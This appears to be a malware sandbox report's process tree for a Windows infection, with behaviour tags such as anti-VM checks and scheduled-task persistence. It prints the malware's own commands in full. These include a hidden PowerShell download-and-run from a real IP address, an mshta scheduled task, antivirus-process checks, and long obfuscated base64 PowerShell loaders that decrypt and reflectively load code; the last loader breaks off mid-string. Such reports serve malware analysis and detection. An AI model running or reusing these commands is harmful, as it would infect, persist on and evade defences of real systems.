                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                                                          7⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:684
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                                                            8⤵
                                                            • Command and Scripting Interpreter: PowerShell
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:2656
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                                                          7⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:2132
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                                                            8⤵
                                                            • Command and Scripting Interpreter: PowerShell
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:2548
                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                          schtasks /create /tn "B52LCmaEgAN" /tr "mshta \"C:\Temp\ZvLoCXpUF.hta\"" /sc minute /mo 25 /ru "Admin" /f
                                                          7⤵
                                                          • System Location Discovery: System Language Discovery
                                                          • Scheduled Task/Job: Scheduled Task
                                                          PID:2428
                                                        • C:\Windows\SysWOW64\mshta.exe
                                                          mshta "C:\Temp\ZvLoCXpUF.hta"
                                                          7⤵
                                                          • System Location Discovery: System Language Discovery
                                                          • Modifies Internet Explorer settings
                                                          PID:3020
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                                            8⤵
                                                            • Blocklisted process makes network request
                                                            • Command and Scripting Interpreter: PowerShell
                                                            • Downloads MZ/PE file
                                                            • Loads dropped DLL
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:2092
                                                            • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                                                              9⤵
                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                              • Checks BIOS information in registry
                                                              • Executes dropped EXE
                                                              • Identifies Wine through registry keys
                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              PID:656
                                                      • C:\Users\Admin\AppData\Local\Temp\10369460101\Rm3cVPI.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\10369460101\Rm3cVPI.exe"
                                                        6⤵
                                                        • Executes dropped EXE
                                                        • System Location Discovery: System Language Discovery
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        PID:2708
                                                      • C:\Users\Admin\AppData\Local\Temp\10369470101\751a73f7f3.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\10369470101\751a73f7f3.exe"
                                                        6⤵
                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                        • Checks BIOS information in registry
                                                        • Executes dropped EXE
                                                        • Identifies Wine through registry keys
                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                        • System Location Discovery: System Language Discovery
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        PID:2484
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2484 -s 380
                                                          7⤵
                                                          • Program crash
                                                          PID:1656
                                                      • C:\Users\Admin\AppData\Local\Temp\10369480101\TbV75ZR.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\10369480101\TbV75ZR.exe"
                                                        6⤵
                                                        • Executes dropped EXE
                                                        PID:1380
                                                        • C:\Windows\system32\WerFault.exe
                                                          C:\Windows\system32\WerFault.exe -u -p 1380 -s 44
                                                          7⤵
                                                          • Loads dropped DLL
                                                          PID:896
                                                      • C:\Users\Admin\AppData\Local\Temp\10369490101\hYjiwV0.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\10369490101\hYjiwV0.exe"
                                                        6⤵
                                                        • Executes dropped EXE
                                                        PID:2700
                                                        • C:\Windows\system32\WerFault.exe
                                                          C:\Windows\system32\WerFault.exe -u -p 2700 -s 44
                                                          7⤵
                                                            PID:1088
                                                        • C:\Users\Admin\AppData\Local\Temp\10369500101\EPTwCQd.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\10369500101\EPTwCQd.exe"
                                                          6⤵
                                                          • Executes dropped EXE
                                                          PID:2084
                                                          • C:\Windows\system32\WerFault.exe
                                                            C:\Windows\system32\WerFault.exe -u -p 2084 -s 28
                                                            7⤵
                                                              PID:2524
                                                          • C:\Users\Admin\AppData\Local\Temp\10369510101\7IIl2eE.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\10369510101\7IIl2eE.exe"
                                                            6⤵
                                                            • Executes dropped EXE
                                                            • Drops file in Windows directory
                                                            • System Location Discovery: System Language Discovery
                                                            PID:1936
                                                            • C:\Windows\SysWOW64\CMD.exe
                                                              "C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat
                                                              7⤵
                                                              • System Location Discovery: System Language Discovery
                                                              PID:1608
                                                              • C:\Windows\SysWOW64\tasklist.exe
                                                                tasklist
                                                                8⤵
                                                                • Enumerates processes with tasklist
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:1896
                                                              • C:\Windows\SysWOW64\findstr.exe
                                                                findstr /I "opssvc wrsa"
                                                                8⤵
                                                                • System Location Discovery: System Language Discovery
                                                                PID:2668
                                                              • C:\Windows\SysWOW64\tasklist.exe
                                                                tasklist
                                                                8⤵
                                                                • Enumerates processes with tasklist
                                                                • System Location Discovery: System Language Discovery
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:3060
                                                              • C:\Windows\SysWOW64\findstr.exe
                                                                findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
                                                                8⤵
                                                                • System Location Discovery: System Language Discovery
                                                                PID:656
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                cmd /c md 418377
                                                                8⤵
                                                                  PID:2248
                                                                • C:\Windows\SysWOW64\extrac32.exe
                                                                  extrac32 /Y /E Leon.cab
                                                                  8⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:1612
                                                                • C:\Windows\SysWOW64\findstr.exe
                                                                  findstr /V "BEVERAGES" Compilation
                                                                  8⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:2192
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  cmd /c copy /b 418377\Passwords.com + Playing + New + Realized + Uw + Jpeg + Badly + Asbestos + Seeds + Service + Basis + Via 418377\Passwords.com
                                                                  8⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:1736
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  cmd /c copy /b ..\Pendant.cab + ..\Visitor.cab + ..\Illegal.cab + ..\Suddenly.cab + ..\Theology.cab + ..\Kidney.cab + ..\Flying.cab + ..\Tigers.cab N
                                                                  8⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:2120
                                                                • C:\Users\Admin\AppData\Local\Temp\418377\Passwords.com
                                                                  Passwords.com N
                                                                  8⤵
                                                                  • Executes dropped EXE
                                                                  • System Location Discovery: System Language Discovery
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  • Suspicious use of FindShellTrayWindow
                                                                  • Suspicious use of SendNotifyMessage
                                                                  PID:2492
                                                                • C:\Windows\SysWOW64\choice.exe
                                                                  choice /d y /t 5
                                                                  8⤵
                                                                    PID:2472
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10369541121\8BNn7ce.cmd"
                                                                6⤵
                                                                  PID:2620
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10369541121\8BNn7ce.cmd"
                                                                    7⤵
                                                                    • System Location Discovery: System Language Discovery
                                                                    PID:3016
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20uSU8ueGd3TWVtb3J4Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTsJJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVtLkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l6eGd3LkNvcHl4Z3dUbygkaXhnd3N3aGIpeGd3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hnd3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3RlbS54Z3dSZWZsZXhnd2N0aW9ueGd3LkFzc2V4Z3dtYmx5XXhndzo6KCdkeGd3YW9MJ1t4Z3ctMS4uLXhndzRdIC1qeGd3b2luICd4Z3cnKShbYnhnd3l0ZVtdeGd3XSRwYXJ4Z3dhbV92YXhnd3IpOwkkeGd3bGF6PSR4Z3dueC5Fbnhnd3RyeVBveGd3aW50Owl4Z3ckbGF6Lnhnd0ludm9reGd3ZSgkbnV4Z3dsbCwgJHhnd3BhcmFteGd3Ml92YXJ4Z3cpO30kaHhnd29zdC5VeGd3SS5SYXd4Z3dVSS5XaXhnd25kb3dUeGd3aXRsZSB4Z3c9ICR0aXhnd3M7JGxveGd3Zj1bU3l4Z3dzdGVtLnhnd0lPLkZpeGd3bGVdOjp4Z3coJ3R4ZXhnd1RsbEFkeGd3YWVSJ1t4Z3ctMS4uLXhndzExXSAteGd3am9pbiB4Z3cnJykoJHhnd3RpcykueGd3U3BsaXR4Z3coW0Vudnhnd2lyb25teGd3ZW50XTp4Z3c6TmV3THhnd2luZSk7eGd3Zm9yZWF4Z3djaCAoJHhnd3pwamxweGd3IGluICR4Z3dsb2YpIHhnd3sJaWYgeGd3KCR6cGp4Z3dscC5TdHhnd2FydHNXeGd3aXRoKCd4Z3c6OiAnKXhndykJewkJeGd3JGdxYnN4Z3c9JHpwanhnd2xwLlN1eGd3YnN0cml4Z3duZygzKXhndzsJCWJyeGd3ZWFrOwl4Z3d9fSRpdXhnd3A9W3N0eGd3cmluZ1t4Z3ddXSRncXhnd2JzLlNweGd3bGl0KCd4Z3dcJyk7JHhnd25sdD1zeGd3dGF4cCB4Z3cocHNvZ3hnd2wgKFtDeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygkaXVweGd3WzBdKSl4Z3cpOyRqZXhnd2J0PXN0eGd3YXhwICh4Z3dwc29nbHhndyAoW0NveGd3bnZlcnR4Z3ddOjpGcnhnd29tQmFzeGd3ZTY0U3R4Z3dyaW5nKHhndyRpdXBbeGd3MV0pKSl4Z3c7aGV6Z3hnd3ggJG5seGd3dCAkbnV4Z3dsbDtoZXhnd3pneCAkeGd3amVidCB4Z3coLFtzdHhnd3JpbmdbeGd3XV0gKCd4Z3clKicpKXhndzsNCidADQoNCiRybGpmcnAgPSAkdm1lYXJwIC1yZXBsYWNlICd4Z3cnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkcmxqZnJwDQo=')) | Invoke-Expression"
                                                                      8⤵
                                                                      • Command and Scripting Interpreter: PowerShell
                                                                      • System Location Discovery: System Language Discovery
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:2428
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10369631121\8BNn7ce.cmd"
                                                                  6⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:2268
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10369631121\8BNn7ce.cmd"
                                                                    7⤵
                                                                    • System Location Discovery: System Language Discovery
                                                                    PID:2696
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20uSU8ueGd3TWVtb3J4Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTsJJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVtLkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l6eGd3LkNvcHl4Z3dUbygkaXhnd3N3aGIpeGd3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hnd3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3